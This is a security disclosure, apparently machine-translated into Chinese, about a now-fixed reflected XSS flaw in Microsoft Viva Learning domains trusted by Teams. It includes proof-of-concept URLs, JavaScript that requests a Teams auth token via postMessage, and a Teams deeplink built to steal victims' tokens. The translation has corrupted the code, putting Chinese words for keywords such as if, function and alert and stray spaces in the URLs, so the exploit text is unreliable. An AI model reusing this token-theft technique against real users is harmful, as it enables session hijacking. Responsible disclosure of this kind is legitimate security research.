跨站点脚本在多个域和微软团队

反映了跨站脚本(XSS)脆弱性影响的参数/认证/开始。html在以下领域:

• learningclient-canary.teams.microsoft.com
• web.vivalearn.microsoft.com
• client.learningapp.microsoft.com

XSS在这些领域可能导致的影响,其中最严重的可以实现通过client.learningapp.microsoft.com

作为万岁,域是一个可信域学习应用在微软团队,攻击者可以创建一个恶意链接这可能导致被盗用户的身份验证令牌的微软服务(包括团队)。

的概念:

注:问题已经固定,这些XSS载荷将不再触发。

最简单的概念验证将触发一个警告框:

https://client.learningapp.microsoft.com/auth/start.html?provider=LiLHub&loginWebUrl=https: / /www.linkedin.com/&prompt=%22%2F%3E%3C%2Fform%3E%3Cform%20name%3D%22loginForm%22%2F%3E%3Cimg%20src=x%20onerror=alert (document.domain) % 20 / % 3 e

然而,我们也可以工艺更复杂的载荷,而运行eval (atob (“some_payload_in_base64”))。例如,我们可以创建一个执行以下:

如果(typeof initOnNativeMessageProxy = =“函数”){initOnNativeMessageProxy(函数(事件){警报(JSON.stringify(事件))});nativeInterface.framelessPostMessage (' {" id ":“站不住脚”、“函数”:“身份验证。getAuthToken”、“参数”:[[" https://teams.microsoft.com "]]});其他}{receiveMessage函数(事件){如果(event.data。id = = & & event.data“站不住脚”。起源! = null){警报(JSON.stringify (event.data))}}窗口。addEventListener(“信息”,receiveMessage假);上面。postMessage ({" id ":“站不住脚”、“函数”:“身份验证。getAuthToken”、“参数”:[[" https://teams.microsoft.com "]]},“*”);}

这个javascript,当运行在iframe打开微软团队的环境中,将使用javascript postMessage()来获得身份验证令牌为teams.microsoft.com,然后弹出一个警告框,其中包含postMessage ()反应(尽管一个攻击者可以向听众发送令牌)。

这将在桌面客户端或工作团队的浏览器版本(桌面客户端利用framelessPostMessage)。

结合事实,client.learningapp.microsoft.com是一个受信任的域万岁学习允许攻击者起草一份微软团队deeplink如下:

https://teams.microsoft.com/_ / l /任务/ 2 e3a628d - 6 - f54 - 4100 - 9 - e7a f00bc3621a85 ? url = https://client.learningapp.microsoft.com/auth/start.html?provider=LiLHub&loginWebUrl=https: / /www.linkedin.com/&prompt= " / > < /形式> <表单名称= " loginForm " / > < img src = x onerror = eval (atob (“BASE64_Payload”)) / >

在2 e3a628d - 6 - f54 - 4100 - 9 - e7a f00bc3621a85对应万岁学习应用。

这个链接,点击在微软团队聊天将允许攻击者窃取受害者身份验证令牌。